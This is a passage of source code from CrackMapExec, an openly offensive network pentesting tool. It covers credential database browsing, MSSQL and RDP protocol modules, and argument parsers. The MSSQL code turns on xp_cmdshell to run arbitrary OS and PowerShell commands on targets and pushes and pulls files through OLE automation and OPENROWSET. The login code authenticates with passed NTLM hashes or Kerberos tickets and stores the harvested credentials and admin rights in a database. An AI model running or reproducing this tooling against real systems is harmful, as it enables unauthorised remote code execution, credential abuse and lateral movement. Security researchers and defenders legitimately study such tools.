creds = self.db.get_credentials(cred_type="hash")
self.display_creds(creds)
else:
creds = self.db.get_credentials(filter_term=filter_term)
data = [["CredID", "CredType", "Domain", "UserName", "Password"]]
cred_id_list = []
for cred in creds:
cred_id_list.append(cred[0])
data.append([cred[0], cred[1], cred[2], cred[3], cred[4]])
print_table(data, title="Credential(s)")
data = [["HostID", "IP", "Hostname", "Domain", "OS"]]
for cred_id in cred_id_list:
links = self.db.get_admin_relations(user_id=cred_id)
for link in links:
link_id, cred_id, host_id = link
hosts = self.db.get_hosts(host_id)
for host in hosts:
data.append([host[0], host[1], host[2], host[3], host[4]])
print_table(data, title="Admin Access to Host(s)")
def do_clear_database(self, line):
if input("This will destroy all data in the current database, are you SURE you want to run this? (y/n): ") == "y":
self.db.clear_database()
@staticmethod
def help_clear_database():
help_string = """
clear_database
THIS COMPLETELY DESTROYS ALL DATA IN THE CURRENTLY CONNECTED DATABASE
YOU CANNOT UNDO THIS COMMAND
"""
print_help(help_string)
def complete_hosts(self, text, line):
"""
Tab-complete 'creds' commands
"""
commands = ("add", "remove")
mline = line.partition(" ")[2]
offs = len(mline) - len(text)
return [s[offs:] for s in commands if s.startswith(mline)]
def complete_creds(self, text, line):
"""
Tab-complete 'creds' commands
"""
commands = ("add", "remove", "hash", "plaintext")
mline = line.partition(" ")[2]
offs = len(mline) - len(text)
return [s[offs:] for s in commands if s.startswith(mline)]
================================================
FILE: cme/protocols/mssql/mssqlexec.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import binascii
from cme.logger import cme_logger
class MSSQLEXEC:
def __init__(self, connection):
self.mssql_conn = connection
self.outputBuffer = ""
def execute(self, command, output=False):
command_output = []
try:
self.enable_xp_cmdshell()
except Exception as e:
cme_logger.error(f"Error when attempting to enable x_cmdshell: {e}")
try:
result = self.mssql_conn.sql_query(f"exec master..xp_cmdshell '{command}'")
cme_logger.debug(f"SQL Query Result: {result}")
for row in result:
if row["output"] == "NULL":
continue
command_output.append(row["output"])
except Exception as e:
cme_logger.error(f"Error when attempting to execute command via xp_cmdshell: {e}")
if output:
cme_logger.debug(f"Output is enabled")
for row in command_output:
cme_logger.debug(row)
# self.mssql_conn.printReplies()
# self.mssql_conn.colMeta[0]["TypeData"] = 80 * 2
# self.mssql_conn.printRows()
# self.outputBuffer = self.mssql_conn._MSSQL__rowsPrinter.getMessage()
# if len(self.outputBuffer):
# self.outputBuffer = self.outputBuffer.split('\n', 2)[2]
try:
self.disable_xp_cmdshell()
except Exception as e:
cme_logger.error(f"[OPSEC] Error when attempting to disable xp_cmdshell: {e}")
return command_output
# return self.outputBuffer
def enable_xp_cmdshell(self):
self.mssql_conn.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
def disable_xp_cmdshell(self):
self.mssql_conn.sql_query("exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure 'show advanced options', 0 ;RECONFIGURE;")
def enable_ole(self):
self.mssql_conn.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'Ole Automation Procedures', 1;RECONFIGURE;")
def disable_ole(self):
self.mssql_conn.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'Ole Automation Procedures', 0;RECONFIGURE;")
def put_file(self, data, remote):
try:
self.enable_ole()
hexdata = data.hex()
self.mssql_conn.sql_query("DECLARE @ob INT;" "EXEC sp_OACreate 'ADODB.Stream', @ob OUTPUT;" "EXEC sp_OASetProperty @ob, 'Type', 1;" "EXEC sp_OAMethod @ob, 'Open';" "EXEC sp_OAMethod @ob, 'Write', NULL, 0x{};" "EXEC sp_OAMethod @ob, 'SaveToFile', NULL, '{}', 2;" "EXEC sp_OAMethod @ob, 'Close';" "EXEC sp_OADestroy @ob;".format(hexdata, remote))
self.disable_ole()
except Exception as e:
cme_logger.debug(f"Error uploading via mssqlexec: {e}")
def file_exists(self, remote):
try:
res = self.mssql_conn.batch(f"DECLARE @r INT; EXEC master.dbo.xp_fileexist '{remote}', @r OUTPUT; SELECT @r as n")[0]["n"]
return res == 1
except:
return False
def get_file(self, remote, local):
try:
self.mssql_conn.sql_query(f"SELECT * FROM OPENROWSET(BULK N'{remote}', SINGLE_BLOB) rs")
data = self.mssql_conn.rows[0]["BulkColumn"]
with open(local, "wb+") as f:
f.write(binascii.unhexlify(data))
except Exception as e:
cme_logger.debug(f"Error downloading via mssqlexec: {e}")
================================================
FILE: cme/protocols/mssql/proto_args.py
================================================
from argparse import _StoreTrueAction
def proto_args(parser, std_parser, module_parser):
mssql_parser = parser.add_parser('mssql', help="own stuff using MSSQL", parents=[std_parser, module_parser])
mssql_parser.add_argument("-H", '--hash', metavar="HASH", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')
mssql_parser.add_argument("--port", default=1433, type=int, metavar='PORT', help='MSSQL port (default: 1433)')
mssql_parser.add_argument("-q", "--query", dest='mssql_query', metavar='QUERY', type=str, help='execute the specified query against the MSSQL DB')
no_smb_arg = mssql_parser.add_argument("--no-smb", action=get_conditional_action(_StoreTrueAction), make_required=[], help='No smb connection')
dgroup = mssql_parser.add_mutually_exclusive_group()
domain_arg = dgroup.add_argument("-d", metavar="DOMAIN", dest='domain', type=str, help="domain name")
dgroup.add_argument("--local-auth", action='store_true', help='authenticate locally to each target')
no_smb_arg.make_required = [domain_arg]
cgroup = mssql_parser.add_argument_group("Command Execution", "options for executing commands")
cgroup.add_argument('--force-ps32', action='store_true', help='force the PowerShell command to run in a 32-bit process')
cgroup.add_argument('--no-output', action='store_true', help='do not retrieve command output')
xgroup = cgroup.add_mutually_exclusive_group()
xgroup.add_argument("-x", metavar="COMMAND", dest='execute', help="execute the specified command")
xgroup.add_argument("-X", metavar="PS_COMMAND", dest='ps_execute', help='execute the specified PowerShell command')
psgroup = mssql_parser.add_argument_group('Powershell Obfuscation', "Options for PowerShell script obfuscation")
psgroup.add_argument('--obfs', action='store_true', help='Obfuscate PowerShell scripts')
psgroup.add_argument('--clear-obfscripts', action='store_true', help='Clear all cached obfuscated PowerShell scripts')
tgroup = mssql_parser.add_argument_group("Files", "Options for put and get remote files")
tgroup.add_argument("--put-file", nargs=2, metavar="FILE", help='Put a local file into remote target, ex: whoami.txt C:\\Windows\\Temp\\whoami.txt')
tgroup.add_argument("--get-file", nargs=2, metavar="FILE", help='Get a remote file, ex: C:\\Windows\\Temp\\whoami.txt whoami.txt')
return parser
def get_conditional_action(baseAction):
class ConditionalAction(baseAction):
def __init__(self, option_strings, dest, **kwargs):
x = kwargs.pop('make_required', [])
super(ConditionalAction, self).__init__(option_strings, dest, **kwargs)
self.make_required = x
def __call__(self, parser, namespace, values, option_string=None):
for x in self.make_required:
x.required = True
super(ConditionalAction, self).__call__(parser, namespace, values, option_string)
return ConditionalAction
================================================
FILE: cme/protocols/mssql.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
import os
from io import StringIO
from cme.config import process_secret
from cme.protocols.mssql.mssqlexec import MSSQLEXEC
from cme.connection import *
from cme.helpers.logger import highlight
from cme.helpers.bloodhound import add_user_bh
from cme.helpers.powershell import create_ps_command
from impacket import tds
from impacket.krb5.ccache import CCache
from impacket.smbconnection import SMBConnection, SessionError
from impacket.tds import (
SQLErrorException,
TDS_LOGINACK_TOKEN,
TDS_ERROR_TOKEN,
TDS_ENVCHANGE_TOKEN,
TDS_INFO_TOKEN,
TDS_ENVCHANGE_VARCHAR,
TDS_ENVCHANGE_DATABASE,
TDS_ENVCHANGE_LANGUAGE,
TDS_ENVCHANGE_CHARSET,
TDS_ENVCHANGE_PACKETSIZE,
)
class mssql(connection):
def __init__(self, args, db, host):
self.mssql_instances = None
self.domain = None
self.server_os = None
self.hash = None
self.os_arch = None
self.nthash = ""
connection.__init__(self, args, db, host)
def proto_flow(self):
self.proto_logger()
if self.create_conn_obj():
self.enum_host_info()
self.print_host_info()
if self.login():
if hasattr(self.args, "module") and self.args.module:
self.call_modules()
else:
self.call_cmd_args()
def proto_logger(self):
self.logger = CMEAdapter(
extra={
"protocol": "MSSQL",
"host": self.host,
"port": self.args.port,
"hostname": "None",
}
)
def enum_host_info(self):
# this try pass breaks module http server, more info https://github.com/byt3bl33d3r/CrackMapExec/issues/363
try:
# Probably a better way of doing this, grab our IP from the socket
self.local_ip = str(self.conn.socket).split()[2].split("=")[1].split(":")[0]
except:
pass
if self.args.no_smb:
self.domain = self.args.domain
else:
try:
smb_conn = SMBConnection(self.host, self.host, None)
try:
smb_conn.login("", "")
except SessionError as e:
if "STATUS_ACCESS_DENIED" in e.getErrorString():
pass
self.domain = smb_conn.getServerDNSDomainName()
self.hostname = smb_conn.getServerName()
self.server_os = smb_conn.getServerOS()
self.logger.extra["hostname"] = self.hostname
try:
smb_conn.logoff()
except:
pass
if self.args.domain:
self.domain = self.args.domain
if self.args.local_auth:
self.domain = self.hostname
except Exception as e:
self.logger.fail(f"Error retrieving host domain: {e} specify one manually with the '-d' flag")
self.mssql_instances = self.conn.getInstances(0)
self.db.add_host(
self.host,
self.hostname,
self.domain,
self.server_os,
len(self.mssql_instances),
)
try:
self.conn.disconnect()
except:
pass
def print_host_info(self):
self.logger.display(f"{self.server_os} (name:{self.hostname}) (domain:{self.domain})")
# if len(self.mssql_instances) > 0:
# self.logger.display("MSSQL DB Instances: {}".format(len(self.mssql_instances)))
# for i, instance in enumerate(self.mssql_instances):
# self.logger.debug("Instance {}".format(i))
# for key in instance.keys():
# self.logger.debug(key + ":" + instance[key])
def create_conn_obj(self):
try:
self.conn = tds.MSSQL(self.host, self.args.port)
self.conn.connect()
except socket.error as e:
self.logger.debug(f"Error connecting to MSSQL: {e}")
return False
return True
def check_if_admin(self):
try:
results = self.conn.sql_query("SELECT IS_SRVROLEMEMBER('sysadmin')")
is_admin = int(results[0][""])
except Exception as e:
self.logger.fail(f"Error querying for sysadmin role: {e}")
return False
if is_admin:
self.admin_privs = True
self.logger.debug(f"User is admin")
else:
return False
return True
def kerberos_login(
self,
domain,
username,
password="",
ntlm_hash="",
aesKey="",
kdcHost="",
useCache=False,
):
try:
self.conn.disconnect()
except:
pass
self.create_conn_obj()
nthash = ""
hashes = None
if ntlm_hash != "":
if ntlm_hash.find(":") != -1:
hashes = ntlm_hash
nthash = ntlm_hash.split(":")[1]
else:
# only nt hash
hashes = f":{ntlm_hash}"
nthash = ntlm_hash
if not all("" == s for s in [self.nthash, password, aesKey]):
kerb_pass = next(s for s in [self.nthash, password, aesKey] if s)
else:
kerb_pass = ""
try:
res = self.conn.kerberosLogin(
None,
username,
password,
domain,
hashes,
aesKey,
kdcHost=kdcHost,
useCache=useCache,
)
if res is not True:
self.conn.printReplies()
return False
self.password = password
if username == "" and useCache:
ccache = CCache.loadFile(os.getenv("KRB5CCNAME"))
principal = ccache.principal.toPrincipal()
self.username = principal.components[0]
username = principal.components[0]
else:
self.username = username
self.domain = domain
self.check_if_admin()
used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}"
domain = f"{domain}\\" if not self.args.local_auth else ""
self.logger.success(f"{domain}{username}{used_ccache} {self.mark_pwned()}")
if not self.args.local_auth:
add_user_bh(self.username, self.domain, self.logger, self.config)
return True
except Exception as e:
used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}"
domain = f"{domain}\\" if not self.args.local_auth else ""
self.logger.fail(f"{domain}\\{username}{used_ccache} {e}")
return False
def plaintext_login(self, domain, username, password):
try:
self.conn.disconnect()
except:
pass
self.create_conn_obj()
try:
# this is to prevent a decoding issue in impacket/ntlm.py:617 where it attempts to decode the domain
if not domain:
domain = ""
res = self.conn.login(None, username, password, domain, None, not self.args.local_auth)
if res is not True:
self.handle_mssql_reply()
return False
self.password = password
self.username = username
self.domain = domain
self.check_if_admin()
self.db.add_credential("plaintext", domain, username, password)
if self.admin_privs:
self.db.add_admin_user("plaintext", domain, username, password, self.host)
domain = f"{domain}\\" if not self.args.local_auth else ""
out = f"{domain}{username}:{process_secret(password)} {self.mark_pwned()}"
self.logger.success(out)
if not self.args.local_auth:
add_user_bh(self.username, self.domain, self.logger, self.config)
return True
except BrokenPipeError as e:
self.logger.fail(f"Broken Pipe Error while attempting to login")
return False
except Exception as e:
self.logger.fail(f"{domain}\\{username}:{process_secret(password)}")
self.logger.exception(e)
return False
def hash_login(self, domain, username, ntlm_hash):
lmhash = ""
nthash = ""
# This checks to see if we didn't provide the LM Hash
if ntlm_hash.find(":") != -1:
lmhash, nthash = ntlm_hash.split(":")
else:
nthash = ntlm_hash
try:
self.conn.disconnect()
except:
pass
self.create_conn_obj()
try:
res = self.conn.login(
None,
username,
"",
domain,
":" + nthash if not lmhash else ntlm_hash,
not self.args.local_auth,
)
if res is not True:
self.conn.printReplies()
return False
self.hash = ntlm_hash
self.username = username
self.domain = domain
self.check_if_admin()
self.db.add_credential("hash", domain, username, ntlm_hash)
if self.admin_privs:
self.db.add_admin_user("hash", domain, username, ntlm_hash, self.host)
out = f"{domain}\\{username} {process_secret(ntlm_hash)} {self.mark_pwned()}"
self.logger.success(out)
if not self.args.local_auth:
add_user_bh(self.username, self.domain, self.logger, self.config)
return True
except BrokenPipeError as e:
self.logger.fail(f"Broken Pipe Error while attempting to login")
return False
except Exception as e:
self.logger.fail(f"{domain}\\{username}:{process_secret(ntlm_hash)} {e}")
return False
def mssql_query(self):
if self.conn.lastError:
# Invalid connection
return None
query = self.args.mssql_query
self.logger.info(f"Query to run:\n{query}")
try:
raw_output = self.conn.sql_query(query)
self.logger.info("Executed MSSQL query")
self.logger.debug(f"Raw output: {raw_output}")
for data in raw_output:
if isinstance(data, dict):
for key, value in data.items():
if key:
self.logger.highlight(f"{key}:{value}")
else:
self.logger.highlight(f"{value}")
else:
self.logger.fail("Unexpected output")
except Exception as e:
self.logger.exception(e)
return None
return raw_output
@requires_admin
def execute(self, payload=None, print_output=False):
if not payload and self.args.execute:
payload = self.args.execute
self.logger.info(f"Command to execute:\n{payload}")
try:
exec_method = MSSQLEXEC(self.conn)
raw_output = exec_method.execute(payload, print_output)
self.logger.info("Executed command via mssqlexec")
self.logger.debug(f"Raw output: {raw_output}")
except Exception as e:
self.logger.exception(e)
return None
if hasattr(self, "server"):
self.server.track_host(self.host)
if self.args.execute or self.args.ps_execute:
self.logger.success("Executed command via mssqlexec")
if self.args.no_output:
self.logger.debug(f"Output set to disabled")
else:
for line in raw_output:
self.logger.highlight(line)
return raw_output
@requires_admin
def ps_execute(
self,
payload=None,
get_output=False,
methods=None,
force_ps32=False,
dont_obfs=True,
):
if not payload and self.args.ps_execute:
payload = self.args.ps_execute
if not self.args.no_output:
get_output = True
# We're disabling PS obfuscation by default as it breaks the MSSQLEXEC execution method
ps_command = create_ps_command(payload, force_ps32=force_ps32, dont_obfs=dont_obfs)
return self.execute(ps_command, get_output)
@requires_admin
def put_file(self):
self.logger.display(f"Copy {self.args.put_file[0]} to {self.args.put_file[1]}")
with open(self.args.put_file[0], "rb") as f:
try:
data = f.read()
self.logger.display(f"Size is {len(data)} bytes")
exec_method = MSSQLEXEC(self.conn)
exec_method.put_file(data, self.args.put_file[1])
if exec_method.file_exists(self.args.put_file[1]):
self.logger.success("File has been uploaded on the remote machine")
else:
self.logger.fail("File does not exist on the remote system... error during upload")
except Exception as e:
self.logger.fail(f"Error during upload : {e}")
@requires_admin
def get_file(self):
remote_path = self.args.get_file[0]
download_path = self.args.get_file[1]
self.logger.display(f'Copying "{remote_path}" to "{download_path}"')
try:
exec_method = MSSQLEXEC(self.conn)
exec_method.get_file(self.args.get_file[0], self.args.get_file[1])
self.logger.success(f'File "{remote_path}" was downloaded to "{download_path}"')
except Exception as e:
self.logger.fail(f'Error reading file "{remote_path}": {e}')
if os.path.getsize(download_path) == 0:
os.remove(download_path)
# We hook these functions in the tds library to use CME's logger instead of printing the output to stdout
# The whole tds library in impacket needs a good overhaul to preserve my sanity
def handle_mssql_reply(self):
for keys in self.conn.replies.keys():
for i, key in enumerate(self.conn.replies[keys]):
if key["TokenType"] == TDS_ERROR_TOKEN:
error = f"ERROR({key['ServerName'].decode('utf-16le')}): Line {key['LineNumber']:d}: {key['MsgText'].decode('utf-16le')}"
self.conn.lastError = SQLErrorException(f"ERROR: Line {key['LineNumber']:d}: {key['MsgText'].decode('utf-16le')}")
self.logger.fail(error)
elif key["TokenType"] == TDS_INFO_TOKEN:
self.logger.display(f"INFO({key['ServerName'].decode('utf-16le')}): Line {key['LineNumber']:d}: {key['MsgText'].decode('utf-16le')}")
elif key["TokenType"] == TDS_LOGINACK_TOKEN:
self.logger.display(f"ACK: Result: {key['Interface']} - {key['ProgName'].decode('utf-16le')} ({key['MajorVer']:d}{key['MinorVer']:d} {key['BuildNumHi']:d}{key['BuildNumLow']:d}) ")
elif key["TokenType"] == TDS_ENVCHANGE_TOKEN:
if key["Type"] in (
TDS_ENVCHANGE_DATABASE,
TDS_ENVCHANGE_LANGUAGE,
TDS_ENVCHANGE_CHARSET,
TDS_ENVCHANGE_PACKETSIZE,
):
record = TDS_ENVCHANGE_VARCHAR(key["Data"])
if record["OldValue"] == "":
record["OldValue"] = "None".encode("utf-16le")
elif record["NewValue"] == "":
record["NewValue"] = "None".encode("utf-16le")
if key["Type"] == TDS_ENVCHANGE_DATABASE:
_type = "DATABASE"
elif key["Type"] == TDS_ENVCHANGE_LANGUAGE:
_type = "LANGUAGE"
elif key["Type"] == TDS_ENVCHANGE_CHARSET:
_type = "CHARSET"
elif key["Type"] == TDS_ENVCHANGE_PACKETSIZE:
_type = "PACKETSIZE"
else:
_type = f"{key['Type']:d}"
self.logger.display(f"ENVCHANGE({_type}): Old Value: {record['OldValue'].decode('utf-16le')}, New Value: {record['NewValue'].decode('utf-16le')}")
================================================
FILE: cme/protocols/rdp/__init__.py
================================================
================================================
FILE: cme/protocols/rdp/database.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pathlib import Path
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy import MetaData, Table
from sqlalchemy.exc import (
IllegalStateChangeError,
NoInspectionAvailable,
NoSuchTableError,
)
from cme.logger import cme_logger
class database:
def __init__(self, db_engine):
self.CredentialsTable = None
self.HostsTable = None
self.db_engine = db_engine
self.db_path = self.db_engine.url.database
self.protocol = Path(self.db_path).stem.upper()
self.metadata = MetaData()
self.reflect_tables()
session_factory = sessionmaker(bind=self.db_engine, expire_on_commit=True)
Session = scoped_session(session_factory)
# this is still named "conn" when it is the session object; TODO: rename
self.conn = Session()
@staticmethod
def db_schema(db_conn):
db_conn.execute(
"""CREATE TABLE "credentials" (
"id" integer PRIMARY KEY,
"username" text,
"password" text,
"pkey" text
)"""
)
db_conn.execute(
"""CREATE TABLE "hosts" (
"id" integer PRIMARY KEY,
"ip" text,
"hostname" text,
"port" integer,
"server_banner" text
)"""
)
def reflect_tables(self):
with self.db_engine.connect() as conn:
try:
self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine)
self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine)
except (NoInspectionAvailable, NoSuchTableError):
print(
f"""
[-] Error reflecting tables for the {self.protocol} protocol - this means there is a DB schema mismatch
[-] This is probably because a newer version of CME is being ran on an old DB schema
[-] Optionally save the old DB data (`cp {self.db_path} ~/cme_{self.protocol.lower()}.bak`)
[-] Then remove the {self.protocol} DB (`rm -f {self.db_path}`) and run CME to initialize the new DB"""
)
exit()
def shutdown_db(self):
try:
self.conn.close()
# due to the async nature of CME, sometimes session state is a bit messy and this will throw:
# Method 'close()' can't be called here; method '_connection_for_bind()' is already in progress and
# this would cause an unexpected state change to
except IllegalStateChangeError as e:
cme_logger.debug(f"Error while closing session db object: {e}")
def clear_database(self):
for table in self.metadata.sorted_tables:
self.conn.execute(table.delete())
================================================
FILE: cme/protocols/rdp/db_navigator.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from cme.cmedb import DatabaseNavigator, print_help
class navigator(DatabaseNavigator):
def do_clear_database(self, line):
if input("This will destroy all data in the current database, are you SURE you want to run this? (y/n): ") == "y":
self.db.clear_database()
def help_clear_database(self):
help_string = """
clear_database
THIS COMPLETELY DESTROYS ALL DATA IN THE CURRENTLY CONNECTED DATABASE
YOU CANNOT UNDO THIS COMMAND
"""
print_help(help_string)
================================================
FILE: cme/protocols/rdp/proto_args.py
================================================
def proto_args(parser, std_parser, module_parser):
rdp_parser = parser.add_parser('rdp', help="own stuff using RDP", parents=[std_parser, module_parser])
rdp_parser.add_argument("-H", '--hash', metavar="HASH", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')
rdp_parser.add_argument("--port", type=int, default=3389, help="Custom RDP port")
rdp_parser.add_argument("--rdp-timeout", type=int, default=5, help="RDP timeout on socket connection, defalut is %(default)ss")
rdp_parser.add_argument("--nla-screenshot", action="store_true", help="Screenshot RDP login prompt if NLA is disabled")
dgroup = rdp_parser.add_mutually_exclusive_group()
dgroup.add_argument("-d", metavar="DOMAIN", dest='domain', type=str, default=None, help="domain to authenticate to")
dgroup.add_argument("--local-auth", action='store_true', help='authenticate locally to each target')
egroup = rdp_parser.add_argument_group("Screenshot", "Remote Desktop Screenshot")
egroup.add_argument("--screenshot", action="store_true", help="Screenshot RDP if connection success")
egroup.add_argument('--screentime', type=int, default=10, help='Time to wait for desktop image, default is %(default)ss')
egroup.add_argument('--res', default='1024x768', help='Resolution in "WIDTHxHEIGHT" format. Default: "1024x768"')
return parser
================================================
FILE: cme/protocols/rdp.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import asyncio
import os
from datetime import datetime
from os import getenv
from termcolor import colored
from impacket.krb5.ccache import CCache
from cme.connection import *
from cme.helpers.bloodhound import add_user_bh
from cme.logger import CMEAdapter
from cme.config import host_info_colors
from cme.config import process_secret
from aardwolf.connection import RDPConnection
from aardwolf.commons.queuedata.constants import VIDEO_FORMAT
from aardwolf.commons.iosettings import RDPIOSettings
from aardwolf.commons.target import RDPTarget
from aardwolf.protocol.x224.constants import SUPP_PROTOCOLS
from asyauth.common.credentials.ntlm import NTLMCredential
from asyauth.common.credentials.kerberos import KerberosCredential
from asyauth.common.constants import asyauthSecret
from asysocks.unicomm.common.target import UniTarget, UniProto
class rdp(connection):
def __init__(self, args, db, host):
self.domain = None
self.server_os = None
self.iosettings = RDPIOSettings()
self.iosettings.channels = []
self.iosettings.video_out_format = VIDEO_FORMAT.RAW
self.iosettings.clipboard_use_pyperclip = False
self.protoflags_nla = [
SUPP_PROTOCOLS.SSL | SUPP_PROTOCOLS.RDP,
SUPP_PROTOCOLS.SSL,
SUPP_PROTOCOLS.RDP,
]
self.protoflags = [
SUPP_PROTOCOLS.SSL | SUPP_PROTOCOLS.RDP,
SUPP_PROTOCOLS.SSL,
SUPP_PROTOCOLS.RDP,
SUPP_PROTOCOLS.SSL | SUPP_PROTOCOLS.HYBRID,
SUPP_PROTOCOLS.SSL | SUPP_PROTOCOLS.HYBRID_EX,
]
width, height = args.res.upper().split("X")
height = int(height)
width = int(width)
self.iosettings.video_width = width
self.iosettings.video_height = height
# servers dont support 8 any more :/
self.iosettings.video_bpp_min = 15
self.iosettings.video_bpp_max = 32
# PIL produces incorrect picture for some reason?! TODO: check bug
self.iosettings.video_out_format = VIDEO_FORMAT.PNG #
self.output_filename = None
self.domain = None
self.server_os = None
self.url = None
self.nla = True
self.hybrid = False
self.target = None
self.auth = None
self.rdp_error_status = {
"0xc0000071": "STATUS_PASSWORD_EXPIRED",
"0xc0000234": "STATUS_ACCOUNT_LOCKED_OUT",
"0xc0000072": "STATUS_ACCOUNT_DISABLED",
"0xc0000193": "STATUS_ACCOUNT_EXPIRED",
"0xc000006E": "STATUS_ACCOUNT_RESTRICTION",
"0xc000006F": "STATUS_INVALID_LOGON_HOURS",
"0xc0000070": "STATUS_INVALID_WORKSTATION",
"0xc000015B": "STATUS_LOGON_TYPE_NOT_GRANTED",
"0xc0000224": "STATUS_PASSWORD_MUST_CHANGE",
"0xc0000022": "STATUS_ACCESS_DENIED",
"0xc000006d": "STATUS_LOGON_FAILURE",
"0xc000006a": "STATUS_WRONG_PASSWORD ",
"KDC_ERR_CLIENT_REVOKED": "KDC_ERR_CLIENT_REVOKED",
"KDC_ERR_PREAUTH_FAILED": "KDC_ERR_PREAUTH_FAILED",
}
connection.__init__(self, args, db, host)
# def proto_flow(self):
# if self.create_conn_obj():
# self.proto_logger()
# self.print_host_info()
# if self.login() or (self.username == '' and self.password == ''):
# if hasattr(self.args, 'module') and self.args.module:
# self.call_modules()
# else:
# self.call_cmd_args()
def proto_logger(self):
self.logger = CMEAdapter(
extra={
"protocol": "RDP",
"host": self.host,
"port": self.args.port,
"hostname": self.hostname,
}
)
def print_host_info(self):
nla = colored(f"nla:{self.nla}", host_info_colors[3], attrs=['bold']) if self.nla else colored(f"nla:{self.nla}", host_info_colors[2], attrs=['bold'])
if self.domain is None:
self.logger.display("Probably old, doesn't not support HYBRID or HYBRID_EX" f" ({nla})")
else:
self.logger.display(f"{self.server_os} (name:{self.hostname}) (domain:{self.domain})" f" ({nla})")
return True
def create_conn_obj(self):
self.target = RDPTarget(ip=self.host, domain="FAKE", port=self.args.port, timeout=self.args.rdp_timeout)
self.auth = NTLMCredential(secret="pass", username="user", domain="FAKE", stype=asyauthSecret.PASS)
self.check_nla()
for proto in reversed(self.protoflags):
try:
self.iosettings.supported_protocols = proto
self.conn = RDPConnection(
iosettings=self.iosettings,
target=self.target,
credentials=self.auth,
)
asyncio.run(self.connect_rdp())
except OSError as e:
if "Errno 104" not in str(e):
return False
except Exception as e:
if "TCPSocket" in str(e):
return False
if "Reason:" not in str(e):
try:
info_domain = self.conn.get_extra_info()
except:
pass
else:
self.domain = info_domain["dnsdomainname"]
self.hostname = info_domain["computername"]
self.server_os = info_domain["os_guess"] + " Build " + str(info_domain["os_build"])
self.logger.extra["hostname"] = self.hostname
self.output_filename = os.path.expanduser(f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}".replace(":", "-"))
break
if self.args.domain:
self.domain = self.args.domain
if self.args.local_auth:
self.domain = self.hostname
self.target = RDPTarget(
ip=self.host,
hostname=self.hostname,
port=self.args.port,
domain=self.domain,
dc_ip=self.domain,
timeout=self.args.rdp_timeout,
)
return True
def check_nla(self):
for proto in self.protoflags_nla:
try:
self.iosettings.supported_protocols = proto
self.conn = RDPConnection(
iosettings=self.iosettings,
target=self.target,
credentials=self.auth,
)
asyncio.run(self.connect_rdp())
if str(proto) == "SUPP_PROTOCOLS.RDP" or str(proto) == "SUPP_PROTOCOLS.SSL" or str(proto) == "SUPP_PROTOCOLS.SSL|SUPP_PROTOCOLS.RDP":
self.nla = False
return
except Exception as e:
pass
async def connect_rdp(self):
_, err = await asyncio.wait_for(self.conn.connect(), timeout=self.args.rdp_timeout)
if err is not None:
raise err
def kerberos_login(self, domain, username, password="", ntlm_hash="", aesKey="", kdcHost="", useCache=False):
try:
lmhash = ""
nthash = ""
# This checks to see if we didn't provide the LM Hash
if ntlm_hash.find(":") != -1:
lmhash, nthash = ntlm_hash.split(":")
self.hash = nthash
else:
nthash = ntlm_hash
self.hash = ntlm_hash
if lmhash:
self.lmhash = lmhash
if nthash:
self.nthash = nthash
if not all("" == s for s in [nthash, password, aesKey]):
kerb_pass = next(s for s in [nthash, password, aesKey] if s)
else:
kerb_pass = ""
fqdn_host = self.hostname + "." + self.domain
password = password if password else nthash
if useCache:
stype = asyauthSecret.CCACHE
if not password:
password = getenv("KRB5CCNAME") if not password else password
if "/" in password:
self.logger.fail("Kerberos ticket need to be on the local directory")
return False
ccache = CCache.loadFile(getenv("KRB5CCNAME"))
ticketCreds = ccache.credentials[0]
username = ticketCreds["client"].prettyPrint().decode().split("@")[0]
else:
stype = asyauthSecret.PASS if not nthash else asyauthSecret.NT
kerberos_target = UniTarget(
self.domain,
88,
UniProto.CLIENT_TCP,
proxies=None,
dns=None,
dc_ip=self.domain,
domain=self.domain
)
self.auth = KerberosCredential(
target=kerberos_target,
secret=password,
username=username,
domain=domain,
stype=stype,
)
self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth)
asyncio.run(self.connect_rdp())
self.admin_privs = True
self.logger.success(
"{}\\{}{} {}".format(
domain,
username,
(
# Show what was used between cleartext, nthash, aesKey and ccache
" from ccache"
if useCache
else ":%s" % (process_secret(kerb_pass))
),
self.mark_pwned(),
)
)
if not self.args.local_auth:
add_user_bh(username, domain, self.logger, self.config)
return True
except Exception as e:
if "KDC_ERR" in str(e):
reason = None
for word in self.rdp_error_status.keys():
if word in str(e):
reason = self.rdp_error_status[word]
self.logger.fail(
(f"{domain}\\{username}{' from ccache' if useCache else ':%s' % (process_secret(kerb_pass))} {f'({reason})' if reason else str(e)}"),
color=("magenta" if ((reason or "CredSSP" in str(e)) and reason != "KDC_ERR_C_PRINCIPAL_UNKNOWN") else "red"),
)
elif "Authentication failed!" in str(e):
self.logger.success(f"{domain}\\{username}:{(process_secret(password))} {self.mark_pwned()}")
elif "No such file" in str(e):
self.logger.fail(e)
else:
reason = None
for word in self.rdp_error_status.keys():
if word in str(e):
reason = self.rdp_error_status[word]
if "cannot unpack non-iterable NoneType object" == str(e):
reason = "User valid but cannot connect"
self.logger.fail(
(f"{domain}\\{username}{' from ccache' if useCache else ':%s' % (process_secret(kerb_pass))} {f'({reason})' if reason else ''}"),
color=("magenta" if ((reason or "CredSSP" in str(e)) and reason != "STATUS_LOGON_FAILURE") else "red"),
)
return False
def plaintext_login(self, domain, username, password):
try:
self.auth = NTLMCredential(
